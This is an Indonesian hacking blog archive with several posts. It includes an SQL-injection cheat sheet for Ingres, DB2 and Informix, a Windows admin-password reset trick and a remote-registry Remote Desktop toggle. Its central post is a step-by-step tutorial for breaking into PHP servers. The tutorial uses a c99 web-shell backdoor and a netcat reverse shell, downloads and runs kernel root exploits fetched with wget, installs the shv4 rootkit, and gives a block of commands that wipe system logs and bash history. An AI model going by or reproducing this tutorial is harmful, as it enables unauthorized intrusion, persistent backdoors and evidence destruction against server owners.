
Find Tables From Column NameTODO
Select Nth RowAstoundingly, this doesn’t seem to be possible! This is as close as you can get:


select top 10 blah from table;



select first 10 blah form table;

Select Nth Charselect substr(‘abc’, 2, 1); — returns ‘b’
Bitwise ANDThe function “bit_and” exists, but seems hard to use. Here’s an


example of ANDing 3 and 5 together. The result is a “byte” type


with value \001:


select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> CharTODO
Char -> ASCII ValueTODO


(The “ascii” function exists, but doesn’t seem to do what I’d expect.)

Castingselect cast(123 as varchar);


select cast(‘123′ as integer);

String Concatenationselect ‘abc’ || ‘def’;
If StatementTODO
Case StatementTODO
Avoiding QuotesTODO
Time Delay???


See Heavy Queries article for some ideas.

Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressTODO
Location of DB filesTODO
Default/System DatabasesTODO
Installing LocallyThe Ingres database can be downloaded for free from http://esd.ingres.com/



A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832

Database ClientTODO


There is a client called “sql” which can be used for local connections (at least) in the database server package above.

Logging in from command line$ su – ingres


$ sql iidbdb


* select dbmsinfo(‘_version’); \go

Identifying on the networkTODO

DB2


Versionselect versionnumber, version_timestamp from sysibm.sysversions;
Commentsselect blah from foo; — comment like this
Current Userselect user from sysibm.sysdummy1;


select session_user from sysibm.sysdummy1;


select system_user from sysibm.sysdummy1;

List UsersN/A (I think DB2 uses OS-level user accounts for authentication.)


Database authorities (like roles, I think) can be listed like this:



select grantee from syscat.dbauth;

List Password HashesN/A (I think DB2 uses OS-level user accounts for authentication.)
List Privilegesselect * from syscat.tabauth; — privs on tables


select * from syscat.dbauth where grantee = current user;



select * from syscat.tabauth where grantee = current user;

List DBA AccountsTODO
Current Databaseselect current server from sysibm.sysdummy1;
List DatabasesSELECT schemaname FROM syscat.schemata;
List Columnsselect name, tbname, coltype from sysibm.syscolumns;
List Tablesselect name from sysibm.systables;
Find Tables From Column NameTODO
Select Nth Rowselect name from (SELECT name FROM sysibm.systables order by


name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth CharSELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b
Bitwise ANDThis page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Charselect chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Valueselect ascii(‘A’) from sysibm.sysdummy1; — returns 65
CastingSELECT cast(‘123′ as integer) FROM sysibm.sysdummy1;



SELECT cast(1 as char) FROM sysibm.sysdummy1;

String ConcatenationSELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’



select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’

If StatementTODO
Case StatementTODO
Avoiding QuotesTODO
Time Delay???See Heavy Queries article for some ideas.
Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressTODO
Location of DB filesTODO
Default/System DatabasesTODO

Informix


VersionSELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1;


SELECT DBINFO(‘version’, ’server-type’) FROM systables WHERE tabid = 1;



SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1;


SELECT
DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows,
U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix,
F=64-bit app running on 64-bit unix

Commentsselect 1 FROM systables WHERE tabid = 1; — comment
Current UserSELECT USER FROM systables WHERE tabid = 1;


select CURRENT_ROLE FROM systables WHERE tabid = 1;

List Usersselect username, usertype, password from sysusers;
List Password HashesTODO
List Privilegesselect
tabname, grantor, grantee, tabauth FROM systabauth join systables on
systables.tabid = systabauth.tabid; — which tables are accessible by
which users



select procname, owner, grantor, grantee
from sysprocauth join sysprocedures on sysprocauth.procid =
sysprocedures.procid; — which procedures are accessible by which users

List DBA AccountsTODO
Current DatabaseSELECT DBSERVERNAME FROM systables where tabid = 1; — server name
List Databasesselect name, owner from sysdatabases;
List Columnsselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
List Tablesselect tabname, owner FROM systables;



select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;

List Stored Proceduresselect procname, owner FROM sysprocedures;
Find Tables From Column Nameselect
tabname, colname, owner, coltype FROM syscolumns join systables on
syscolumns.tabid = systables.tabid where colname like ‘%pass%’;
Select Nth Rowselect
first 1 tabid from (select first 10 tabid from systables order by
tabid) as sq order by tabid desc; — selects the 10th row
Select Nth CharSELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’
Bitwise ANDselect bitand(6, 1) from systables where tabid = 1; — returns 0


select bitand(6, 2) from systables where tabid = 1; — returns 2

ASCII Value -> CharTODO
Char -> ASCII Valueselect ascii(‘A’) from systables where tabid = 1;
Castingselect cast(‘123′ as integer) from systables where tabid = 1;



select cast(1 as char) from systables where tabid = 1;

String ConcatenationSELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’



SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’

String LengthSELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;
If StatementTODO
Case Statementselect tabid, case when tabid>10 then “High” else ‘Low’ end from systables;
Avoiding QuotesTODO
Time DelayTODO
Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressSELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname
Location of DB filesTODO
Default/System DatabasesThese are the system databases:


sysmaster


sysadmin*


sysuser*



sysutils*


* = don’t seem to contain anything / don’t allow reading

Installing LocallyYou can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.
Database ClientThere’s a database client SDK available, but I couldn’t get the demo client working.


I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).

Logging in from command lineIf you get local admin rights on a Windows box and have a GUI logon:



  • Click:
    Start | All Programs | IBM Informix Dynamic Server 11.50 |
    someservername. This will give you a command prompt with various
    Environment variables set properly.

  • Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.


The
following were set on my test system. This may help if you get command
line access, but can’t get a GUI – you’ll need to change
“testservername”:



set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50


set INFORMIXSERVER=testservername


set ONCONFIG=ONCONFIG.testservername


set
PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program
Files\IBM\Informix\Clien-SDK\bin;C:\Program
Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib


set
CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar;


set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp


set CLIENT_LOCALE=EN_US.CP1252


set DB_LOCALE=EN_US.8859-1


set SERVER_LOCALE=EN_US.CP1252



set DBLANG=EN_US.CP1252


mode con codepage select=1252

Identifying on the network My
default installation listened on two TCP ports: 9088 and 9099. When I
created a new “server name”, this listened on 1526/TCP by default. Nmap
4.76 didn’t identify these ports as Informix:


$ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all




1526/tcp open pdap-np?


9088/tcp open unknown


9089/tcp open unknown



TODO How would we identify Informix listening on the network?


0 komentar more...

How to use local root exploit

by d0ntcry on Nov.22, 2009, under

-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tutorial by iLhaM BLoodroSE
How to use local root exploit
www.rosebanditz.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-

hy :-D
lgsg aja ya :haha:

bahan2 yang kamu butuhkan adalah :
*local.tgz -> download di http://d.rosebanditz.org
*NC -> download di http://d.rosebanditz.org
*target php (safe mode OFF)
*ssh account
*putty

@mengapa harus menggunakan ssh , dalam ngeroot ini
karena jika menggunakan shell target php , tidak bisa melakukan
bash command , bash command harus diaksses melalui ssh

the way is :
1. cari target php safe mode off yg firewallnya ga keblock
(cek port refused ato time out , kalo time out kemungkinan besar ga bisa connect pake NC )

2. buka putty kamu . login. terus masukin NC nya , (wget http://bloodrose.tk/download/exploit/nc ) kalo wget ga bisa pakai lwp-download , curl -O , kalo masih ga bisa pake winscp untuk mindah NC ke ssh kamu.

3. di ssh ketik chmod 777 nc / chmod +x nc

4. kembali pada target php gunakan backdoor c99 versi FaTaLisTiCz_Fx Fx29Sh v1 06.2008 c99 shell
download di : http://rosebanditz.tk/file/download.php?id=c74d97b01eae257e44aa9d5bade97baf

5. kembali pada putty aktifkan open port nc dengan command
./nc -lvp port misalnya ./nc -lpv 8910

6. lalu pada target php tadi dengan menggunakan backdoor tersebut
pilih backconnect gunakan isi port 8910 dan masukkan ip host dari putty kamu pilih perl lalu click connect kalo perl OFF gunakan C lalu connect

7. cek ssh kamu apabila sudah konek maka akan tersambung dengan
data2 ditarget php kamu

8. ready to war , sekarang kamu download local.tgz melalui ssh tadi yang sudah terkonek dengan shell target php , wget http://bloodrose.tk/download/exploit/local.tgz , sekali lagi kalo wget ga bisa masukkan pake lwp-download ato curl -O , kalo semisalnya masihg belum bisa masukan dengan download binary safe pada shell target php kamu

9. setelah sudah didownload ketik tar -zxvf local.tgz

10. masuk folder local dengan mengetik command cd local , lalu ketik ls -als untuk mengecek isinya

11. nah disinilah keberuntngan mulai bermain , cek kernel dengan command uname -a

12. tidak semua kernel bisa diexploit ( apalagi yg udah dipatch) hwhw
misalnya saja kita pake kernel 2.4.20 kebanyakn ini bisa di root pake exploit w00t pada local.tgz tadi jadi saat di folder local ketik ./w00t tunggu sebentar, dan wow you got the root ! :D , dan misalnya
ga pake kernel tersebut kamu bisa menggunakn exploit2 yang lain yang bisa kamu cek dengan google , ketik aja "local exploit kernel 2.4.40 misalnya , cari yg cocok lalu wget aja ke ssh kmu, misal berformat .c , misal , martha.c untuk mengexsprotnya ketik cc -o xpl martha.c , martha.c berganti dengan xpl lalu chmod +x xpl lgsg run ./xpl , tunggu aja beberapa saat lalu cek id jika id root u got the root!

13. setelah dapat root apa yang harus kita lakukan ?menginstal backdoor , saya selalu mengguhana shv untuk menginstall backdoor
saya menggunakan shv4.tar.gz , jadi commandnya sebagai berikut
pada putty kamu :

* download/upload it :
http://bloodrose.tk/download/exploit/shv4.tar.gz
* tar -zxvf shv4.tar.gz
* cd shv4
* ./setup password port
* finish :D
* cek portnya sudah accpeted apa belum kalo sudah acpted
login dengan putty pada port tersebut dan host ip tersebut
username : root password : passwordnya


14. menghapus jejak, menghapus jejak hoho mungkin banyak sekali tutor yg menjelaskan menghapus jejak , tapi saya sendiri tidak terlalu extrem menggunakan seperti itu
yg dimana namanya kita masuk tanpa izin pasti tercium juga baunya
hahaha, apalagi kalo kita gunakan root root itu dengan menginstal server , psy , bot misalnya. meskipun sudah disembunyikantetapi tetap terlihat juga (kebetulan saya pernah jadi sysadmin hehe)
tapi biasanya saya menggunakan juga command seperti ini :


echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r



15. sekarang terserah anda mo diapain root itu , tapi pesan saya
jangan merusak karena kasian sysadminya dan yg punya rootnya
karena mereka bekerja untuk itu , tapi ya terserah sih hak pribadi masing2 hoho :beer:


#################################

jika masih ada yg bingung bisa disampaikan disini
atau email ke admin@rosebanditz.org

sampe jumpa ditutorial berikutnya :semangat:

by iLhaM BLoodroSE
3 komentar more...

Membuat spoiler di blogspot

by d0ntcry on Nov.22, 2009, under

spoiler yang sngat sederhana sekali.....contoh :

Judul Spoiler [cekidot] :

[ISI SPOILER]



Ne kodenya :


0 komentar more...

Membuat bot tanpa shell

by d0ntcry on Nov.22, 2009, under ,

Membuat bot tanpa shell, mksudnya kita jalanin di komputer kita dengan Os windows

oke.. langsung aja..

1. Download windrop disini
2. Ekstrak di c:\ menjadi folder windrop -> c:\windrop
2. Cari file bot.cfg dan edit :
  • set my-hostname "localhost" <-- biarin aja
  • set my-ip "192.168.0.5" <-- ip komputer km : masuk cmd ketik ipconfig
  • set nick "google" <-- nick bot km
  • set owner "d0ntcry" <-- nick owner
  • set basechan "#kompeni" <-- channel masuk pertama join
  • set username "cry" <-- ident / user id

just it... okey..


3. masuk ke cmd > pindah ke direktori windrop > ketik eggdrop -m bot.cfg > enter




4. lihat di channel.. botnya udah join pa belom.. kalo udah msg bot ketik :
/msg pass
/msg auth
5. kalo belom join tolong dibaca pada saat meng-enter perintah eggdrop tadi.. script mana yg error...
6. komputer mati.. bot akan mati.. (Read error: Connection reset by peer)
7. matiin bot sama dengan matiin aplikasi yg berjalan di windows.. yaitu melalui task manager windows > cari eggdrop.exe > end process
8. menambah tcl :
- file tcl kamu taru' dulu di scripts (windrop/scripts)
- km tambahkan juga tulisan tambah tcl tadi di bot.cfg bawah sendiri :
source scripts/bulan.tcl
source scripts/hiburan.tcl
source scripts/.....????
- ada cara lain se... tapi mudahnya kaya gitu aja...
9. sudah ada tcl²nya dalam windrop yang saya edit ini.. silakan liat di bot.cfg
10. untuk mengedit tulisan² yang tampil di channel silakan edit d0ntcry.tcl di folder windrop/scripts dan edit servernya juga disitu ( bawah sendiri )

ok.. cukup gitu aja... ^^
kalo ada yang belum paham... silakan tanya langsung aja ya:D
#kompeni@irc.dal.net

Download tcl :
addsong.tcl
antiadvertise.tcl
astro.tcl
away.tcl
ccasbase.tcl
cerewet.tcl
ceriwis.tcl
chanprotect.tcl
chanrelay.tcl
deopcs.tcl
detik.tcl
family100
game4in1.tcl
gate.tcl
guard.tcl
http.tcl
ident.tcl
identify.tcl
idlechan.tcl
iplocator.tcl
jarak.tcl
joinflood.tcl
jump.tcl
kernel.tcl
lag.tcl
login.tcl
lucu.tcl
main.tcl
milan.tcl
mp3.tcl
nmap.tcl
novirii.tcl
optriggers.tcl
os.tcl
passchecker.tcl
passchk.tcl
profile.tcl
quitban.tcl
respon.tcl
say.tcl
sendmail.tcl
services.tcl
slap.tcl
statistics.tcl
stats.tcl
target.tcl
timebomb.tcl
translator.tcl
unload.tcl
whois.tcl
8 komentar more...

Aktifkan remote dekstop

by d0ntcry on Nov.22, 2009, under

Untuk mengaktifkan remote desktop menggunakan regedit, ikuti langkah berikut ini:
  1. Jalankan REGEDIT dari Start>Run
  2. Click File, lalu pilih Connect Network Registry
  3. Ketik IP address komputer yang ingin di remote atau nama komputernya, di Enter the object name to select dan klik OK.



4. Jika anda tidak punya izin mengakses remote komputer, akan muncul logon screen ketik username and password untuk remote komputer. kemudian klik OK.

5. Kemudian akan muncul IP address atau nama komputer yang akan kita remote di Registry Editor, perhatikan gambar di bawah ini:


6. Masuk ke HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server, di sebelah kanan panel, pilih fDenyTSConnection (REG_DWORD). Ubahlah value data dari 1(Remote Desktop disabled) ke 0 (Remote Desktop enabled).

7. Tutup regedit.


sumber : klik
2 komentar more...

Regedit menggunakan TweakUI

by d0ntcry on Nov.22, 2009, under

Cara mudah memodifikasi regedit menggunakan TweakUI

Pertama
download dulu TweakUI yang masih berbentuk file zip. Kemudian ekstrak ke sembarang folder. Jika lancar akan terdapat empat buah file. Untuk menginstall caranya sebagai berikut :
  1. Klik kanan pada file tweakui.inf, pilih Install.
  2. Program akan meminta file tweakui.cnt. Klik aja pada Browse, dan arahkan ke letak folder tempat Anda menyimpan file tweakui.cnt.
  3. Klik OK, OK.
  4. Akan muncul window Help-nya Tweak UI. Tutup aja window tersebut, maka proses install akan segera dilanjutkan (jika Anda belum menutup window tersebut, maka proses install tidak akan dilanjutkan).
  5. Selesai.
sumber : klik-kanan.com

ini ada yang lain dari microsoft untuk windows SP1 atau diatasnya... >> download <<
2 komentar more...

Struktur Registry

by d0ntcry on Nov.22, 2009, under

Struktur Registry






















1. HKEY_CLASSES_ROOT
Nama lain dari key ini adalah HKCR, key ini merupakan tempat dimana seluruh asosiasi file Windows disimpan, dan Windows akan mencari special folder type classes. Di dalam struktur, key ini identik dengan HKEY_LOCAL_MACHINE\ SOFTWARE\Classes.

2. HKEY_CURRENT_USER
Nama lain dari key ini adalah HKCU, key ini berisi informasi tentang user yang sedang log in pada saat itu. Terdiri atas subkey, antara lain: AppEvents, berisi setting untuk sound events. Control Panel, berisi setting control panel. InstallLocationMRU, berisi path/lokasi master Windows (waktu pertama kali menginstal Windows). Network, berisi informasi yang berhubungan dengan Network atau jaringan. Software, berisi tentang setting atau konfigurasi software untuk pemakai yang logon pada saat itu. RemoteAccess, berisi informasi tentang Dial up Networking.

3. HKEY_LOCAL_MACHINE
Nama lain dari key ini adalah HKLM, key ini berisi informasi tentang hardware dan setting software yang berlaku untuk semua user. Terdiri atas subkey, antara lain: Enum, berisi informasi tentang hardware, misalnya tentang monitor. Hardware, berisi informasi tentang port serial. Network, berisi informasi yang berhubungan dengan network untuk pemakai yang sedang aktif atau logon. Software, berisi informasi dan setting software.

4. HKEY_USERS
Nama lain dari key ini adalah HKU, key ini berisi informasi tentang desktop dan user setting untuk tiap user yang berhak login ke komputer tersebut. Tiap user mempunyai sebuah subkey. Jika hanya terdapat satu user, maka nama subkey tersebut adalah ".default".

5. HKEY_CURRENT_CONFIG
Nama lain dari key ini adalah HKCC, key ini berisi informasi tentang konfigurasi hardware, berhubungan dengan HKEY_LOCAL_MACHINE.
0 komentar more...

Foto profile facebook keren

by d0ntcry on Nov.22, 2009, under



pengen kaya gitu???

download : gambar background profile fb dengan ukuran 200 x 600

kemudian km coba foto bergelantungan dan edit, bersihin semua sehingga hanya kelihatan badan km aja...

prikitiew...




0 komentar more...

Reset pass admin windows

by d0ntcry on Nov.22, 2009, under ,

Reset password administrator windows XP SP2

cuma mau share aja omz... pengalaman barusan aq coba 100% bisa!!!!

biasanya ctrl+alt+del2x dengan
username : administrator
pass : (dibiarkan kosong)
enter... dah masuk admin, itu kalo pada waktu install pertama kali windows admin dibiarkan kosong...

tapi kalo administrator windows kepassword gmn??masuk safe mode masi aja kepassword..
hemm.. setelah googling sana sini yang pke tools dgn cara brute force dkk...ktemu jalan kluarnya cukup dengan CD bootable windows xp ... :mrgreen: ( dari waktu menunggu kayanya gak beda ma yg bruteforce, tapi aq coba tools bruteforce gagal.. hehehehe.. kaya ophcrack / saminside dengan masukkan file SAM dan system di windows/system32/config .. maklum nyubi )
langsung aja..
1. di bios 1st Boot Device untuk boot melalui CDROM ( sama seperti nginstall windows )
2. enter any key trus F8
3. enter untuk setup xp
4. tekan R untuk repair
5. proses rapair .........
6. komputer ngrestart kemudiaann...
7. pada waktu installing windows tekan SHIFT + F10 untuk masuk cmd
8. ketik lusrmgr.msc atau nusrmgr.cpl trus reset dech password administrator...

tengkyu...
0 komentar more...

Perintah MIRC dalnet

by d0ntcry on Nov.22, 2009, under

Format penulisan perintah :
/msg nickserv@services.dal.net [command] [option] [sub-command]
atau dapat disingkat menjadi :
/ns [command] [option] [sub-command]

.:: REGISTER ::.
Penggunaan : /nickserv REGISTER password email
Keterangan : Perintah ini untuk mendaftarkan/me-Register nickname yang sedang kamu pakai berikut email kamu ke database DALnet (NickServ).
Catatan : Ingat !!! Password itu Case-Sensitive (membedakan antara huruf kapital dan huruf kecil). Setelah meregistrasikan nickname, kamu diwajibkan untuk mengonfirmasikan kembali registrasi nickname kamu dalam waktu 24 jam untuk mendapatkan akses penuh ke nickname kamu. Sebuah email berisi kode konfirmasi akan dikirimkan DALnet ke alamat email yang kamu gunakan pada saat registrasi. Oleh sebab itu sangat penting sekali bagi kamu untuk menggunakan email yang masih aktif/valid. Cara pengonfirmasian adalah menggunakan perintah AUTH atau melalui web-link di email yang kamu terima.

Contoh : /ns REGISTER passwordku d0ntcry@hackermail.com
Mendaftarkan suatu nickname dengan password passwordku dan email d0ntcry@hackermail.com

.:: AUTH ::.
Penggunaan : /nickserv AUTH nickname confirmation-code
Keterangan : Perintah ini gunanya untuk mengonfirmasikan kembali registrasi atau penggantian alamat email atau UnRegister nickname kamu. Sebuah email berisi kode konfirmasi akan dikirimkan DALnet ke alamat email yang kamu gunakan pada saat registrasi atau ke email baru kamu (pada proses perubahan alamat email). Ikuti petunjuk dalam email tersebut !
Catatan : Perintah ini hanya digunakan pada saat registrasi nickname dan pada saat merubah alamat email pada nickname yang sudah teregistrasi penuh (perintah SET - EMAIL) dan pada saat meng-UnRegister nickname (perintah DROP). Dalam tempo 24 jam kamu sudah harus memasukkan kode konfirmasi yang dikirimkan oleh DALnet ke email kamu atau nickname kamu akan kembali menjadi Un-Register (untuk nickname yang diregistrasi baru) atau alamat email nickname kamu akan kembali pada alamat email yang lama (untuk perubahan alamat email pada nickname) atau nickname kamu batal di-Drop oleh NickServ.

.:: IDENTIFY ::.
Penggunaan : /nickserv IDENTIFY password atau /nickserv IDENTIFY nickname password
Keterangan : Perintah yang pertama adalah untuk meng-Identify nickname yang sedang kamu gunakan, perintah yang kedua adalah untuk meng-Identify nickname yang tidak sedang kamu gunakan. Untuk pengguna irc client Mirc dapat langsung menggetikkan /identify password� atau /identify nickname password.
Catatan : Demi keamanan password kamu sendiri sangat dianjurkan untuk tidak menggetikkan identify password kamu di jendela channel atau private message. Ingatlah selalu untuk menggetikkan identify password kamu dan/atau perintah lainnya hanya di jendela Status.

Contoh #1 : /nickserv IDENTIFY passwordku
Meng-Identify nickname yang sedang kamu gunakan dengan password passwordku.
Contoh #2 : /nickserv IDENTIFY d0ntcry passwordku
Meng-Identify nickname d0ntcry dengan password passwordku.

.:: DROP ::.
Penggunaan : /nickserv DROP nickname
Keterangan : Perintah ini gunanya untuk meng-UnRegister suatu nickname.
Catatan : Proses UnRegister ini harus melalui 2 tahap. Pertama, menggunakan perintah DROP di atas. Kedua, menggunakan perintah AUTH untuk mengonfirmasikan proses UnRegister nickname. Setelah menggunakan perintah DROP, NikServ akan mengirimkan email berisi kode konfirmasi ke email kamu yang terdaftar pada database DALnet. Selanjutnya ikuti petunjuk yang terdapat di email tersebut.

Contoh : /nickserv DROP d0ntcry
Meng-UnRegister nickname d0ntcry.

.:: INFO ::.
Penggunaan : /nickserv INFO nickname
Keterangan : Perintah ini gunanya untuk mendapatkan informasi nickname seseorang, mulai dari tanggal registrasi, tanggal terakhir identify, alamat IP terakhir yang digunakan, alamat email, URL, dan opsi-opsi pada nickname tersebut.

.:: SET - PASSWD ::.
Penggunaan : /nickserv SET PASSWD oldpassword newpassword
Keterangan : Perintah ini untuk mengganti password nickname kamu.
Catatan : Kamu identify terlebih dahulu sebelum menggunakan perintah ini. Ingat !!! Password itu Case-Sensitive (membedakan antara huruf kapital dan huruf kecil).

Contoh : /nickserv SET PASSWD passwordku passanyar
Mengganti password nickname dari passwordku menjadi passanyar.


.:: SET - ENFORCE ::.
Penggunaan : /nickserv SET ENFORCE on|off
Keterangan : Perintah ini apabila di-set ke posisi on maka akan mencegah orang lain menggunakan nickname kamu. Nickserv akan memberikan batas waktu 60 detik untuk identify sebelum merubah nickname Enforce on menjadi Guest*****� dimana ***** adalah angka acak (random).
Catatan : Perintah SET ENFORCE ini dulunya dikenal dengan SET KILL.

.:: SET - URL ::.
Penggunaan : /nickserv SET URL [url_address]
Keterangan : Perintah ini untuk men-set URL (Uniform Resource Locator)/alamat Homepage nickname kamu. URL suatu nickname dapat dilihat dengan perintah INFO.
Catatan : Untuk menghapus/me-reset URL nickname kamu gunakan /nickserv SET URL.

Contoh : /nickserv SET URL http://d0ntcry.co.cc
Men-set http://d0ntcry.co.cc sebagai URL nickname kamu.

.:: SET - EMAIL ::.
Penggunaan : /nickserv SET EMAIL [new_email_address]
Keterangan : Perintah ini gunanya untuk mengganti alamat email nickname kamu.
Catatan : Setelah mengganti alamat email nickname, kamu diwajibkan untuk mengonfirmasikan kembali penggantian tersebut dengan perintah AUTH. DALnet akan mengirimkan email berisi kode konfirmasi ke alamat email baru tersebut. Perintah /nickserv SET EMAIL akan memunculkan email nickname kamu yang berada di database NickServ.

Contoh : /nickserv SET EMAIL d0ntcry@hackermail.com
Merubah alamat email menjadi d0ntcry@hackermail.com.

.:: SET - SHOWEMAIL ::.
Penggunaan : /nickserv SET SHOWEMAIL on|off
Keterangan : Perintah ini gunanya untuk menampilkan alamat email nickname kamu pada NickServ INFO.
Catatan : Pada keadaan default SHOWEMAIL berada pada posisi off.

.:: SET - NOMEMO ::.
Penggunaan : /nickserv SET NOMEMO on|off
Keterangan : Perintah ini apabila di-set pada posisi on maka akan mencegah seseorang mengirimkan memo via MemoServ kepada kamu.
Catatan : Biarpun NOMEMO pada posisi on, seorang IRCop ataupun suatu service DALnet tetap dapat mengirimkan memo kepada kamu.

.:: SET - NOOP ::.
Penggunaan : /nickserv SET NOOP on|off
Keterangan : Perintah ini apabila di-set pada posisi on maka akan mencegah seseorang menambahkan nickname kamu ke daftar AOP/SOP suatu channel.
Catatan : Setelah men-set NOOP on bila kamu menginginkan agar nickname kamu ditambahkan ke daftar AOP/SOP suatu channel, kamu cukup men-set NOOP off dan men-set NOOP on setelah nickname kamu masuk ke dalam daftar AOP/SOP.

.:: SET - MAILBLOCK ::.
Penggunaan : /nickserv SET MAILBLOCK on|off
Keterangan : Perintah ini apabila di-set pada posisi on maka kamu tidak akan dapat menggunakan perintah SENDPASS jika pada suatu saat kamu kehilangan/lupa pada password nickname kamu. Default MAILBLOCK adalah off.
Catatan : Perhatian !!! Sebelum men-set MAILBLOCK pada posisi on pastikan bahwa diri kamu tidak menderita penyakit lupa ingatan karena jika suatu saat kamu lupa/kehilangan password tidak seorangpun yang dapat menolong kamu.

.:: GHOST ::.
Penggunaan : /nickserv GHOST nickname password
Keterangan : Perintah ini gunanya untuk men-disconnect-kan suatu nickname dari IRC. Perintah ini digunakan jika terjadi situasi seperti ini : pada saat meninggalkan IRC kamu tidak logoff dengan benar ataupun koneksi IRC kamu terputus karena sesuatu alasan sehingga menyebabkan server IRC mengira kamu masih berada di IRC dan mempertahankan nickname kamu di IRC.

Catatan : Setelah menggunakan perintah GHOST selanjutnya gunakan perintah RELEASE.
Contoh : /nickserv GHOST d0ntcry passwordku
Men-Ghost nickname d0ntcry + password passwordku.

.:: RECOVER ::.
Penggunaan : /nickserv RECOVER nickname password
Keterangan : Perintah ini gunanya untuk men-disconnect-kan suatu nickname dari IRC. Perintah ini digunakan jika terjadi situasi seperti ini : ada orang lain menggunakan nickname kamu yang tidak di-set ENFORCE on.
Catatan : Setelah menggunakan perintah RECOVER selanjutnya gunakan perintah RELEASE. Sebenarnya perintah RECOVER dan GHOST mempunyai fungsi yang sama yaitu men-disconnect-kan suatu nickname dari IRC, saya sendiri tidak jelas mengapa DALnet menggunakan 2 perintah untuk sebuah fungsi yang sama.
Contoh : /nickserv RECOVER d0ntcry passwordku
Men-Recover nickname d0ntcry + password passwordku.

.:: RELEASE ::.
Penggunaan : /nickserv RELEASE nickname password
Keterangan : Perintah ini digunakan setelah perintah GHOST dan RECOVER.
Catatan : Setelah menggunakan perintah GHOST atau RECOVER pada suatu nickname, nickname tersebut akan diambil-alih selama beberapa menit oleh service DALnet (enforcer.dal.net). Perintah ini digunakan untuk meminta enforcer.dal.net agar membebaskan nickname yang bersangkutan.
Contoh : /nickserv RELEASE d0ntcry passwordku
Men-Release nickname d0ntcry + password passwordku.

.:: ACCESS - ADD | DEL | LIST | WIPE ::.
Penggunaan : /nickserv ACCESS ADD|DEL|LIST|WIPE [user@host mask]
Keterangan : Perintah ini digunakan pemilik suatu nickname untuk menambah daftar akses baru (ADD), menghapus daftar akses (DEL), menampilkan datfar akses (LIST) dan menghapus seluruh daftar akses (WIPE)..
Catatan : Apabila alamat IP kamu sekarang berada dalam daftar akses suatu nickname maka kamu dapat menggunakan nickname tersebut tanpa harus identify terlebih dahulu.
Contoh : /nickserv ACCESS ADD sct@si.dudut.info
Menambahkan alamat IP/user@host sct@si.dudut.info pada daftar akses nickname.

.:: ACC ::.
Penggunaan : /nickserv ACC nickname
Keterangan : Perintah ini digunakan untuk melihat hak akses suatu nickname. Berikut di bawah ini adalah definisi dari level hak akses (dalam angka) :
0 = Nickname yang bersangkutan belum di-Register.
1 = Pemakai nickname bersangkutan tidak identify pada NickServ (ini dapat terjadi pada nickname yang tidak di-set Enforce on).
2 = Alamat IP pemakai nickname bersangkutan berada di dalam daftar akses (Access) nickname tersebut.
3 = Pemakai nickname bersangkutan telah identify pada NickServ.

Contoh : /nickserv ACC d0ntcry
Melihat hak akses nick d0ntcry dan notify dari NickServ lebih kurang seperti di bawah ini :
-NickServ- d0ntcry ACC 1

.:: SENDPASS ::.
Penggunaan : /nickserv SENDPASS nickname emailaddress
